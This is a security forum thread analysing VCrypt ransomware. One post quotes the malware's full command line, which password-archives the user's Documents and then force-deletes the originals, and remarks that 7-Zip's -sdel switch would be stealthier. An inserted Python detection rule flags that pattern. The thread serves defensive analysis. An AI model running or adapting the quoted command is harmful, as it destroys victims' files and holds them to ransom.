New VCrypt Ransomware locks files in password-protected 7ZIPs

CyberTech

Level 44
Thread author
Verified
Top Poster
Well-known
Nov 10, 2017
3,247
A new ransomware called VCrypt is targeting French victims by utilizing the legitimate 7zip command-line program to create password-protected archives of data folders.

BleepingComputer was told today about a new ransomware that was deleting all of a victim's files found in Windows data folders and then creating new "encrypted" files named after the folder name.

These encrypted files would utilize a naming format of username_foldername.vxcrypt.

For example, the files in the Documents folder would be deleted, and a file named User_documents.vcrypt would be created, as shown in the image below.

MacDefender

Level 16
Verified
Top Poster
Oct 13, 2019
779
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.

MacDefender

Level 16
Verified
Top Poster
Oct 13, 2019
779
FWIW, luckily, this ransomware is very poorly and dumbly coded:

Code:
2480 - C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ for /F %i in (dir /b "%USERPROFILE%\\Documents\\*.*") do %TEMP%\mod_01.exe a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %USERPROFILE%\%username%_documents.vcrypt %USERPROFILE%\Documents\* & del /f /s /q %USERPROFILE%\Documents\ & FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q

It uses a batch file and the del command to delete the documents. If they wanted to be smart, they'd use the "-sdel" argument to 7za. Attempting to directly delete the user's documents without abusing a whitelisted process triggers most behavior blockers that are able to AMSI inspect batch files.
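The weakness described in this thread is that a behavior blocker trusts 7-Zip by name instead of asking what the archiver was told to do and what else ran in the same cmd.exe chain. The following is an added example for this thread (not code from the article or any AV vendor): a command-line triage rule that flags a password-protected archive combined with destruction of the source, whether by `del` as in the quoted command line or by `-sdel`, while leaving an ordinary password-protected backup alone. The sample events, the `tool.exe` name and `PLACEHOLDER_PASSWORD` are constructed.

```python
# Added example: triage process command lines for archive-based ransomware
# behaviour by looking at the archiver's switches and the rest of the cmd chain.
import re

# 7-Zip switches that matter here: -p<pwd> sets a password, -sdel deletes the
# source files after archiving (the thread notes VCrypt used del instead).
ARCHIVER_PASSWORD = re.compile(r"(?:^|\s)-p\S+", re.IGNORECASE)
ARCHIVER_SELF_DELETE = re.compile(r"(?:^|\s)-sdel\b", re.IGNORECASE)
# Destructive command on a %USERPROFILE% path within the same & chain.
USER_DATA_DELETE = re.compile(
    r"\b(?:del|erase|rmdir|rd)\b[^&|]*?/[sq][^&|]*?%USERPROFILE%", re.IGNORECASE)
# An archiver dropped into %TEMP% and used to add (a) files.
TEMP_ARCHIVER = re.compile(r"%TEMP%\\[^\s\\]+\.exe\s+a\s", re.IGNORECASE)

def score_command_line(cmdline):
    """Return the reasons this process command line resembles archive ransomware."""
    reasons = []
    if ARCHIVER_PASSWORD.search(cmdline):
        reasons.append("password set on archive (-p)")
    if ARCHIVER_SELF_DELETE.search(cmdline):
        reasons.append("archiver deletes its sources (-sdel)")
    if USER_DATA_DELETE.search(cmdline):
        reasons.append("recursive delete of user data in same chain")
    if TEMP_ARCHIVER.search(cmdline):
        reasons.append("archiver binary run from %TEMP%")
    return reasons

def is_suspicious(cmdline):
    """Password plus destruction of the source in one chain is the pattern;
    a password-protected archive alone (an ordinary backup) is left alone."""
    reasons = score_command_line(cmdline)
    return (any("password" in r for r in reasons)
            and any("delete" in r for r in reasons))

# Constructed sample events mirroring the command line quoted in the thread.
# PLACEHOLDER_PASSWORD stands in for the real one; tool.exe is a made-up name.
VCRYPT_LIKE = (r"cmd.exe /c %TEMP%\tool.exe a -t7z -r -mx0 -pPLACEHOLDER_PASSWORD "
               r"%USERPROFILE%\user_documents.vcrypt %USERPROFILE%\Documents\* "
               r"& del /f /s /q %USERPROFILE%\Documents\ & rmdir %p /s /q")
SDEL_VARIANT = (r"%TEMP%\tool.exe a -t7z -sdel -pPLACEHOLDER_PASSWORD "
                r"%USERPROFILE%\out.7z %USERPROFILE%\Documents\*")
BENIGN_BACKUP = (r'"C:\Program Files\7-Zip\7z.exe" a -t7z -pMyBackupSecret '
                 r"D:\backup\docs.7z %USERPROFILE%\Documents\*")

def triage(events):
    """Map each (pid, cmdline) event to its reasons, keeping only suspicious ones."""
    return {pid: score_command_line(c) for pid, c in events if is_suspicious(c)}

if __name__ == "__main__":
    for pid, hits in triage([(2480, VCRYPT_LIKE), (2481, SDEL_VARIANT),
                             (2482, BENIGN_BACKUP)]).items():
        print(pid, hits)
```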

SeriousHoax

Level 47
Well-known
Mar 16, 2019
3,630
Tbh, looks like detecting this ransomware shouldn't even require a trigger from a behavior blocker because AVs with good signatures and heuristics should be able to detect it easily without any additional help. E.g., ESET's detection of this malware as "A Variant Of Win32/Filecoder.NTG".

struppigel

Moderator
Verified
Staff Member
Well-known
Apr 9, 2020
656
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

Also written in C 🤔
EDIT: looks like a cybercriminal recreated my PoC and removed the need for a local 7zip copy

The main code is a batch script.

MacDefender

Level 16
Verified
Top Poster
Oct 13, 2019
779
Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

I believe it was ESET or maybe another vendor. Basically they brushed off the proof of concept as not realistic because users archive their files using 7Zip too, or something along those lines. Either way it was a fairly dismissive analysis of a real problem I was trying to demonstrate, which is a lot of behavior blockers turn a blind eye if you have a trusted process be the last agent to modify and delete your documents.

miguelang611

Level 2
Apr 13, 2020
99
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.

As an idea, for people with AVs that have different restriction levels (Kaspersky has it; I guess other AVs do too), maybe configure 7z to allow access to just one folder, like the Downloads folder. Then it would only encrypt that folder in case of an attack o_O

Might not be perfect, but I guess it would do the job :unsure: